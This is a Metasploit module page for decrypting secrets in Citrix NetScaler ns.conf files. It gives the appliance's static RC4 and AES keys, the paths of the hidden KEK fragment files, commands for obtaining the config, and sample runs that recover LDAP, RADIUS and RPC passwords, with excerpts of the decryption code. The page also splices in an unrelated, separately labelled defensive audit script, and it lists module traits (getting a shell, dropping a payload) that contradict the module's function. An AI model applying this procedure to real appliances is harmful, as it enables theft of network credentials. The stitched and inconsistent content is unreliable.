Decrypt Citrix NetScaler Config Secrets - Metasploit


This page contains detailed information about how to use the auxiliary/admin/citrix/citrix_netscaler_config_decrypt Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Decrypt Citrix NetScaler Config Secrets
Module: auxiliary/admin/citrix/citrix_netscaler_config_decrypt
Source code: modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb
Disclosure date: 2022-05-19
Last modification time: 2022-07-13 08:36:18 +0000
Supported architecture(s): -
Supported platform(s): BSD
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module takes a Citrix NetScaler ns.conf configuration file as input and extracts secrets that have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4) as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key and F2.key are provided.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Module leaves a payload or a dropper on the target machine.

Basic Usage


msf > use auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf auxiliary(citrix_netscaler_config_decrypt) > show targets
    ... a list of targets ...
msf auxiliary(citrix_netscaler_config_decrypt) > set TARGET target-id
msf auxiliary(citrix_netscaler_config_decrypt) > show options
    ... show and set options ...
msf auxiliary(citrix_netscaler_config_decrypt) > exploit

Required Options


  • NS_CONF: Path to a NetScaler configuration file (ns.conf)

Knowledge Base


This module takes a Citrix NetScaler ns.conf configuration file as input and extracts secrets that have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4) as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key and F2.key are provided. Currently, keys for appliances in FIPS mode or running hardware HSM cannot be extracted. Root access to a NetScaler device or access to a NetScaler configuration backup are the most effective means of acquiring the configuration file and key fragments.

This module incorporates research published by dozer:

https://dozer.nz/posts/citrix-decrypt/

Vulnerable Application


This module is tested against the configuration files for NetScaler versions 10.x, 11.x, 12.x and 13.x. The module will work with files retrieved from a live NetScaler system as well as files extracted from an unencrypted NetScaler backup archive. This is possible because NetScaler uses well-known hard-coded encryption keys which are visible on the system in the hidden file:

/nsconfig/.skf

These static keys are:

NetScaler RC4:
  2286da6ca015bcd9b7259753c2a5fbc2
NetScaler AES:
  351cbe38f041320f22d990ad8365889c7de2fcccae5a1a8707e21e4adccd4ad9

The module is also able to decrypt secrets encrypted with NetScaler KEK, provided the associated F1.key and F2.key fragments are provided. Private key passphrases that use -passcrypt are not currently decryptable by this module, but any secret that uses the -encrypted parameter should be fully recoverable.

Verification Steps


You must possess a NetScaler ns.conf file in order to use this module. If the NetScaler is running NS13.0 Build76.xx.nc or higher, or the administrator has configured KEK encryption, you must also possess the associated KEK key fragments in order to decrypt the file. All files must be local to the system invoking the module. Where possible, you should provide the NS_IP option to tag relevant loot entries with the IPv4 address of the originating system. If no value is provided for NS_IP the module defaults to assigning the loopback IP 127.0.0.1.

  1. Acquire the ns.conf file, and associated F1.key and F2.key files if using NS KEK
  2. Start msfconsole
  3. Do: modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb
  4. Do: set ns_conf <path to ns.conf> to provide the location of the NetScaler config file
  5. Do: set ns_kek_f1 <path to f1.key> if you are decrypting a file using NS KEK
  6. Do: set ns_kek_f2 <path to f2.key> if you are decrypting a file using NS KEK
  7. Do: set ns_ip <NetScaler IPv4> to attach the target NetScaler IPv4 address to loot entries
  8. Do: dump

Options


NS_CONF

Path to the NetScaler configuration file on the local system. Example: /tmp/ns.conf

NS_KEK_F1

Path to the first of two NS KEK fragments, if decrypting NS KEK. Example: /tmp/F1.key

NS_KEK_F2

Path to the second of two NS KEK fragments, if decrypting NS KEK. Example: /tmp/F2.key

NS_IP

Optional parameter to set the IPv4 address associated with loot entries made by the module.

Scenarios


Acquire NetScaler Config File

NetScaler configuration files can be retrieved from a live system by running

show ns.conf

from the nscli, or

cat /nsconfig/ns.conf

from the BSD shell. These files can also be retrieved from NetScaler configuration backup archives which are generated from the appliance admin interface.

Acquire KEK Fragment Files

As of NS13.0 Build76.xx.nc NetScaler requires mandatory use of the Key Encryption Key (KEK) scheme. If secrets within the config file use KEK, you must also possess the associated KEK F1 and F2 fragment files in order to perform decryption. Secrets that require KEK fragments to decrypt will include the -kek parameter on the associated configuration line. It is possible for an admin to manually enable KEK in NS builds prior to Build76.xx.nc; if this has been done, the current KEK key fragments are located in the following paths:

/nsconfig/F1.key
/nsconfig/F2.key

After NS13.0 Build76.xx.nc, KEK is mandatory and managed by the NetScaler itself. Key fragments are presumably regenerated during firmware upgrades, and a journal is maintained in /nsconfig/keys suffixed with a date stamp. The F1.key and F2.key files are ignored, and the new "current" KEK key is stored in hidden files at paths:

/nsconfig/.F1.key
/nsconfig/.F2.key

As well as under /nsconfig/keys. Note that both fragments must be provided for successful decryption. The module can be run without providing KEK fragments, but will be unable to decrypt any secrets that use KEK encryption. An unencrypted NetScaler backup archive will contain all KEK fragments currently defined on the appliance as well as the current ns.conf file.
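
A defensive counterpart to the distinction drawn above, as an added example that is not part of the module or the original page: it inventories which secrets in an ns.conf carry -encrypted alone, -encrypted with -kek, or -passcrypt, and redacts the ciphertext so the report can be shared. The sample config, the helper names and the EXPOSURE wording are constructed for illustration.

```ruby
# Added example: inventory how each secret in an ns.conf is protected.
# Nothing is decrypted; ciphertext is redacted so the report can be shared.

# Constructed sample config (names, addresses and hex values are made up).
SAMPLE_NS_CONF = <<~CONF
  set ns config -IPAddress 192.0.2.10 -netmask 255.255.255.0
  add ssl certKey web_example -cert web.pem -key web.key -passcrypt "Q09OU1RSVUNURUQ=" -expiryMonitor DISABLED
  add authentication radiusAction RAD1 -serverIP 192.0.2.20 -radKey 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff -encrypted -encryptmethod ENCMTHD_3
  add authentication ldapAction LDAP1 -serverName ldap.example.test -ldapBindDn svc@example.test -ldapBindDnPassword ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
  set ns rpcNode 192.0.2.11 -password 0123456789abcdef0123456789abcdef -encrypted -srcIP 192.0.2.11
CONF

# What each protection class means, following the page's description.
EXPOSURE = {
  static_key: 'recoverable from ns.conf alone (appliance-wide static key)',
  kek: 'recovery also needs the F1/F2 KEK fragment files',
  passcrypt: '-passcrypt entry, not handled by the module'
}.freeze

# True if the flag is its own token, or is glued to the end of a hex
# ciphertext (as happens in some of the sample output on this page).
def flag?(tokens, name)
  tokens.any? { |t| t == name || t.match?(/\A\h+#{Regexp.escape(name)}\z/) }
end

# Returns nil for lines that carry no stored secret.
def classify_secret_line(line)
  tokens = line.split
  protection =
    if flag?(tokens, '-passcrypt')
      :passcrypt
    elsif flag?(tokens, '-encrypted')
      flag?(tokens, '-kek') ? :kek : :static_key
    end
  return nil unless protection

  {
    object: tokens.take_while { |t| !t.start_with?('-') }.first(4).join(' '),
    protection: protection,
    method: line[/-encryptmethod\s+(\S+)/, 1],   # raw tag, nil if absent
    kek_suffix: line[/-suffix\s+(\S+)/, 1]       # date stamp of the KEK in use
  }
end

# Replace hex ciphertext and quoted -passcrypt values with a marker.
def redact(line)
  line.gsub(/\h{32,}/, '<redacted>')
      .gsub(/(-passcrypt\s+)"[^"]*"/, '\1"<redacted>"')
end

# One finding per secret-bearing line, with its 1-based line number.
def audit_ns_conf(text)
  text.each_line.with_index(1).filter_map do |line, lineno|
    finding = classify_secret_line(line.strip)
    finding&.merge(line: lineno, redacted: redact(line.strip))
  end
end

# Count of findings per protection class.
def summarize(findings)
  findings.group_by { |f| f[:protection] }.transform_values(&:size)
end

if __FILE__ == $PROGRAM_NAME
  audit_ns_conf(SAMPLE_NS_CONF).each do |f|
    puts format('L%-3d %-10s %-10s %s', f[:line], f[:protection], f[:method] || '-', f[:object])
    puts "     #{EXPOSURE[f[:protection]]}"
  end
  puts summarize(audit_ns_conf(SAMPLE_NS_CONF)).inspect
end
```

Entries reported as static_key are the ones to rotate first if a config file or backup archive has left the appliance, since no key fragments are needed to recover them.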

Running the Module

Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:

msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump

[*] Config line:
add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
[!] Not decrypting passcrypt entry:
[!] Ciphertext: VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=
[*] Config line:
set ns encryptionParams -method AES256 -keyValue 7654526a2f3ceffd877b286a8acece43da700d06133dc985f7ebdeb076135bcb755472e04f5d92aba9f07334eb8e936a58782ce76bb3f6d6e44adf727e8e88d602b8bdae1817d26203fe281a8429574d -encrypted -encryptmethod ENCMTHD_3
[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
[*] Config line:
add authentication radiusAction UTIL1 -serverIP 10.100.10.13 -serverPort 1812 -radKey f8e4f532e9d4e6bebab169b3be9e77b5c851466b7760c469bd64a15d2e8d3c602025c41372094d06e207789d58b6acb7 -encrypted -encryptmethod ENCMTHD_3
[+] Plaintext: hbZaADYDUmdHv7AhHsAb6eCde2M82m0
[*] Config line:
add authentication ldapAction LDAP -serverName ldap.cesium137.io -serverPort 636 -ldapBase "DC=chainheart,DC=com" -ldapBindDn [email protected] -ldapBindDnPassword f5dc75680b925dbd3c0a8154c8fee056bfe77ac774797de3c0867d368bd09c2cdd872a36e15a1f07abf773740e2c8a12 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName sAMAccountName -groupAttrName memberOf -secType SSL -ldapHostname ldap.cesium137.io
[+] User: [email protected]
[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
[*] Config line:
set ns rpcNode 10.100.10.11 -password 9ec84444b10941dc4222f93b29a75f0aa237ffdcc73a81355bf5d1cf3d80058daaad7ca58e488e54bc3ff3eea8ffd9eb -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
[*] Config line:
set ns rpcNode 10.100.10.12 -password dd5c0c4952509e2fcfaeb238dfc361b79a844df09254087920ee0cf4dc447161bde8491d8a39ded0fa2526cc46e6a00f -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
[*] Config line:
add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password e209865546c3d2e8462e3e7a962252eb6d9e26374163c8d902fc3535cb12638c514765dcea4792eb1e3e6b5e1c1c4cef -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -secure YES -baseDN "DC=chainheart,DC=com" -bindDN [email protected] -filter CN=builtin
[+] User: [email protected]
[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
[*] Config line:
add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 4ae7bec92e25d985df315e543b846b2c30346840d8e945f5073832c3e479d60eee581f67d671759ae555210529eaec8d -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=chainheart,DC=com" -bindDN [email protected] -filter CN=builtin
[+] User: [email protected]
[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
[*] Auxiliary module execution completed
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) >

Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:

msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
ns_conf => /tmp/ns.conf
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
ns_kek_f1 => /tmp/F1.key
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
ns_kek_f2 => /tmp/F2.key
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump

[*] Building NetScaler KEK from key fragments ...
[+] NS KEK F1
[+]      HEX: dd2588bb3cb20dd643216c33489776c78e8c56f13b1301e0984dc80564eea49e
[+] NS KEK F2
[+]      HEX: 45f9e6780a1dc40b6fe75bedf2f6dbb9a86e4315d07313014fe2381c52e44d8f
[+] Assembled NS KEK AES key
[+]      HEX: 54f202b9a94649fd9eaa3f13eab514a5a267f460db0a2393f8b25f321a7d79e0

[*] Config line:
add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key 30f39257d8aacc737182568184e0d535002d90a7aba3454c1e8766a958d3a4a720e485c498adc681f0e7559ff633f932 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
[+] Plaintext: zgkEUD86rUv76coT0DkIBj1xlp5qEzH
[*] Config line:
add ssl certKey ldap_cesium137_io -cert ldap_cesium137_io.pem -key ldap_cesium137_io.key d7902778370c616480ef781c5b3922ef31bd90e75dd3aecfa0fa8a5bafc4fa16b20ed2f7a07970c3f4d8ba201a3b9b72 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor ENABLED -notificationPeriod 90
[+] Plaintext: YaqoRLtSnnMPgnWyhAedYv2RO1aVtx8
[*] Config line:
add ssl certKey mail_cesium137_io -cert mail_cesium137_io-g3.pem -key mail_cesium137_io-g3.key 0e5ca2011772a9943c8f4281668b7236a8dfb97da290487d1953fa5ef768272f33d20122b055878729c75c29efaa3291 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
[+] Plaintext: TBkrkfnP4QOWIT0FX8QCLl2GkNrnM
[*] Config line:
add ssl certKey auth_cesium137_io -cert auth_cesium137_io-g3.pem -key auth_cesium137_io-g3.key d574cca92065da27309ce87a423ac82e0c1571cd4c6df59a725f7eabee97d40136a250152506cb15962e34c90f1dc25c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
[+] Plaintext: flEkB3SW4YTTi9HRNnffmvJLSgJhsz5
[*] Config line:
set ns encryptionParams -method AES256 -keyValue ec5d48485c6871d1d4a2b01f9126946c53aa49eae721c8114ba7a34a1b1f8eabd443a9d641bbf5ef67f2b0237c481673587846db5378f72f9025f0762f8f9cbeebf4a16aaa2782d5c6ecd90c48a1c30d -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
[*] Config line:
add authentication radiusAction APP01_DUO -serverIP 10.100.10.13 -serverPort 11812 -authTimeout 60 -radKey 535587632ffe91f2559fcf5902c7e4bf24961ee2e7f6285c03c87c2e65165fbc -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
[+] Plaintext: IAmSam!
[*] Config line:
add authentication radiusAction APP01_DUO_CITRIXRECEIVER -serverIP 10.100.10.13 -serverPort 21812 -authTimeout 60 -radKey 6644f481004ac7dee5a05b5a8dc3d9d9ae8c76f5fe82e0430b43acd7fb5afe9c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
[+] Plaintext: IAmSam!
[*] Config line:
add authentication ldapAction AD_DUA2FAUSERS -serverName ldap.cesium137.io -serverPort 636 -authTimeout 60 -ldapBase "DC=cesium137,DC=io" -ldapBindDn [email protected] -ldapBindDnPassword 7fbbf2ef9665641264406c17673c0cdb5774b76454f3ac8c7bb067dd0d2228c5 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -ldapLoginName sAMAccountName -searchFilter "&(objectCategory=user)(memberOf=CN=2FA-OWA,CN=Users,DC=cesium137,DC=io)" -groupAttrName memberOf -subAttributeName cn -secType SSL -passwdChange ENABLED -nestedGroupExtraction ON -groupNameIdentifier sAMAccountName -groupSearchAttribute memberOf -groupSearchSubAttribute CN
[+] User: [email protected]
[+] Pass: Gr33n3gg$
[*] Config line:
set ns rpcNode 192.168.10.14 -password 2634fa338c457cb32fdf245873874a9b8fcd7128f6534641f49ea650e9f0974b -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
[+] Plaintext: SamIAm!
[*] Config line:
set ns rpcNode 192.168.10.15 -password 6955e686fc5dd3beee5013dad0e0fa6510a56029b52cc7d7ed15082a60ec6ce4 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
[+] Plaintext: SamIAm!
[*] Config line:
add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password cc1f6bb054f5d63d5eb871fdd36ff573f3343c1e0238965682460c6f084d1e14-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -secure YES -baseDN "DC=cesium137,DC=io" -bindDN [email protected] -filter CN=builtin -devno 13862
[+] User: [email protected]
[+] Pass: Gr33n3gg$
[*] Config line:
add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 5c35e0aa5c3d999e9ff10de1fa32910f9ac28b1ee8824c2301ac964e1f5f987e-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=cesium137,DC=io" -bindDN [email protected] -filter CN=builtin -devno 13863
[+] User: [email protected]
[+] Pass: Gr33n3gg$
[*] Config line:
add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c5990558d4bfae059f27191f4c91a2dfa826d7318db287e109f5da39f9 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35  -LRTM DISABLED -resptimeout 4 -destPort 1812 -devno 13864
[+] User: ldap
[+] Pass: Gr33n3gg$
[*] Auxiliary module execution completed
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 


Msfconsole Usage


Here is how the admin/citrix/citrix_netscaler_config_decrypt auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/citrix/citrix_netscaler_config_decrypt

msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show info

       Name: Decrypt Citrix NetScaler Config Secrets
     Module: auxiliary/admin/citrix/citrix_netscaler_config_decrypt
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2022-05-19

Provided by:
  npm <[email protected]>

Module side effects:
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available actions:
  Name  Description
  ----  -----------
  Dump  Dump secrets from NetScaler configuration

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  NS_CONF                     yes       Path to a NetScaler configuration file (ns.conf)
  NS_IP                       no        (Optional) IPv4 address to attach to loot
  NS_KEK_F1                   no        Path to NetScaler KEK fragment file F1.key
  NS_KEK_F2                   no        Path to NetScaler KEK fragment file F2.key

Description:
  This module takes a Citrix NetScaler ns.conf configuration file as 
  input and extracts secrets that have been stored with reversible 
  encryption. The module supports legacy NetScaler encryption (RC4) as 
  well as the newer AES-256-ECB and AES-256-CBC encryption types. It 
  is also possible to decrypt secrets protected by the Key Encryption 
  Key (KEK) method, provided the key fragment files F1.key and F2.key 
  are provided.

References:
  https://dozer.nz/posts/citrix-decrypt/
  https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/

Module Options


This is a complete list of options available in the admin/citrix/citrix_netscaler_config_decrypt auxiliary module:

msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show options

Module options (auxiliary/admin/citrix/citrix_netscaler_config_decrypt):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   NS_CONF                     yes       Path to a NetScaler configuration file (ns.conf)
   NS_IP                       no        (Optional) IPv4 address to attach to loot
   NS_KEK_F1                   no        Path to NetScaler KEK fragment file F1.key
   NS_KEK_F2                   no        Path to NetScaler KEK fragment file F2.key

Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump secrets from NetScaler configuration

Advanced Options


Here is a complete list of advanced options supported by the admin/citrix/citrix_netscaler_config_decrypt auxiliary module:

msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show advanced

Module advanced options (auxiliary/admin/citrix/citrix_netscaler_config_decrypt):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/citrix/citrix_netscaler_config_decrypt module can do:

msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   Dump  Dump secrets from NetScaler configuration

Evasion Options


Here is the full list of possible evasion options supported by the admin/citrix/citrix_netscaler_config_decrypt auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

KEK files must be 256 bytes in size


Here is a relevant code snippet related to the "KEK files must be 256 bytes in size" error message:

102:	    parse_ns_config
103:	  end
104:	
105:	  def build_ns_kek
106:	    unless File.size(ns_kek_f1) == 256 && File.size(ns_kek_f2) == 256
107:	      print_error('KEK files must be 256 bytes in size')
108:	      return false
109:	    end
110:	    f1_hex = File.binread(ns_kek_f1)
111:	    f2_hex = File.binread(ns_kek_f2)
112:	    unless f1_hex.match?(/^[0-9a-f]+$/i)

Provided F1.key is not valid hexidecimal data


Here is a relevant code snippet related to the "Provided F1.key is not valid hexidecimal data" error message:

108:	      return false
109:	    end
110:	    f1_hex = File.binread(ns_kek_f1)
111:	    f2_hex = File.binread(ns_kek_f2)
112:	    unless f1_hex.match?(/^[0-9a-f]+$/i)
113:	      print_error('Provided F1.key is not valid hexidecimal data')
114:	      raise Msf::OptionValidateError, ['NS_KEK_F1']
115:	    end
116:	    unless f2_hex.match?(/^[0-9a-f]+$/i)
117:	      print_error('Provided F2.key is not valid hexidecimal data')
118:	      raise Msf::OptionValidateError, ['NS_KEK_F2']

NS_KEK_F1


Here is a relevant code snippet related to the "NS_KEK_F1" error message:

109:	    end
110:	    f1_hex = File.binread(ns_kek_f1)
111:	    f2_hex = File.binread(ns_kek_f2)
112:	    unless f1_hex.match?(/^[0-9a-f]+$/i)
113:	      print_error('Provided F1.key is not valid hexidecimal data')
114:	      raise Msf::OptionValidateError, ['NS_KEK_F1']
115:	    end
116:	    unless f2_hex.match?(/^[0-9a-f]+$/i)
117:	      print_error('Provided F2.key is not valid hexidecimal data')
118:	      raise Msf::OptionValidateError, ['NS_KEK_F2']
119:	    end

Provided F2.key is not valid hexidecimal data


Here is a relevant code snippet related to the "Provided F2.key is not valid hexidecimal data" error message:

112:	    unless f1_hex.match?(/^[0-9a-f]+$/i)
113:	      print_error('Provided F1.key is not valid hexidecimal data')
114:	      raise Msf::OptionValidateError, ['NS_KEK_F1']
115:	    end
116:	    unless f2_hex.match?(/^[0-9a-f]+$/i)
117:	      print_error('Provided F2.key is not valid hexidecimal data')
118:	      raise Msf::OptionValidateError, ['NS_KEK_F2']
119:	    end
120:	    f1_key = f1_hex[66..130].scan(/../).map(&:hex).pack('C*')
121:	    f2_key = f2_hex[70..134].scan(/../).map(&:hex).pack('C*')
122:	    f1_key_hex = f1_key.unpack('H*').first

NS_KEK_F2


Here is a relevant code snippet related to the "NS_KEK_F2" error message:

113:	      print_error('Provided F1.key is not valid hexidecimal data')
114:	      raise Msf::OptionValidateError, ['NS_KEK_F1']
115:	    end
116:	    unless f2_hex.match?(/^[0-9a-f]+$/i)
117:	      print_error('Provided F2.key is not valid hexidecimal data')
118:	      raise Msf::OptionValidateError, ['NS_KEK_F2']
119:	    end
120:	    f1_key = f1_hex[66..130].scan(/../).map(&:hex).pack('C*')
121:	    f2_key = f2_hex[70..134].scan(/../).map(&:hex).pack('C*')
122:	    f1_key_hex = f1_key.unpack('H*').first
123:	    f2_key_hex = f2_key.unpack('H*').first

Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible


Here is a relevant code snippet related to the "Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible" error message:

150:	          if config_entry.match?(/-kek/)
151:	            is_kek = true
152:	          end
153:	          print_status("Config line:\n#{config_entry}")
154:	          if is_kek && !@ns_kek_key
155:	            print_warning('Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible')
156:	            next
157:	          end
158:	          username = parse_username_from_config(config_entry)
159:	          ciphertext.each do |encrypted|
160:	            encrypted_entry = encrypted.to_s

Not decrypting passcrypt entry


Here is a relevant code snippet related to the "Not decrypting passcrypt entry" error message:

162:	              ciphertext_bytes = encrypted_entry.scan(/../).map(&:hex).pack('C*')
163:	            else
164:	              ciphertext_b64 = encrypted_entry.split(' ')[1].delete('"')
165:	              # TODO: Implement -passcrypt functionality
166:	              # ciphertext_bytes = Base64.strict_decode64(ciphertext_b64)
167:	              print_warning('Not decrypting passcrypt entry:')
168:	              print_warning("Ciphertext: #{ciphertext_b64}")
169:	              next
170:	            end
171:	            case enc_type
172:	            when 'ENCMTHD_2' # aes-256-ecb

Ciphertext: <CIPHERTEXT_B64>


Here is a relevant code snippet related to the "Ciphertext: <CIPHERTEXT_B64>" error message:

163:	            else
164:	              ciphertext_b64 = encrypted_entry.split(' ')[1].delete('"')
165:	              # TODO: Implement -passcrypt functionality
166:	              # ciphertext_bytes = Base64.strict_decode64(ciphertext_b64)
167:	              print_warning('Not decrypting passcrypt entry:')
168:	              print_warning("Ciphertext: #{ciphertext_b64}")
169:	              next
170:	            end
171:	            case enc_type
172:	            when 'ENCMTHD_2' # aes-256-ecb
173:	              if is_kek

<__METHOD__>: bad decrypt


Here is a relevant code snippet related to the "<__METHOD__>: bad decrypt" error message:

221:	    decipher = OpenSSL::Cipher.new('rc4')
222:	    decipher.decrypt
223:	    decipher.key = rc4key
224:	    decipher.update(ciphertext_bytes)
225:	  rescue OpenSSL::Cipher::CipherError
226:	    print_error("#{__method__}: bad decrypt")
227:	    return false
228:	  end
229:	
230:	  def ns_aes_ecb_decrypt(aeskey, ciphertext_bytes)
231:	    decipher = OpenSSL::Cipher.new('aes-256-ecb')

<__METHOD__>: bad decrypt


Here is a relevant code snippet related to the "<__METHOD__>: bad decrypt" error message:

232:	    decipher.decrypt
233:	    decipher.padding = 0
234:	    decipher.key = aeskey
235:	    (decipher.update(ciphertext_bytes) + decipher.final).delete("\000")
236:	  rescue OpenSSL::Cipher::CipherError
237:	    print_error("#{__method__}: bad decrypt")
238:	    return false
239:	  end
240:	
241:	  def ns_aes_cbc_decrypt(aeskey, ciphertext_bytes)
242:	    decipher = OpenSSL::Cipher.new('aes-256-cbc')

<__METHOD__>: bad decrypt


Here is a relevant code snippet related to the "<__METHOD__>: bad decrypt" error message:

244:	    ciphertext = ciphertext_bytes[16..]
245:	    decipher.decrypt
246:	    decipher.iv = iv
247:	    decipher.padding = 1
248:	    decipher.key = aeskey
249:	    (decipher.update(ciphertext) + decipher.final).delete("\000")
250:	  rescue OpenSSL::Cipher::CipherError
251:	    print_error("#{__method__}: bad decrypt")
252:	    return false
253:	  end
254:	end

Authors


npm[at]cesium137.io

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
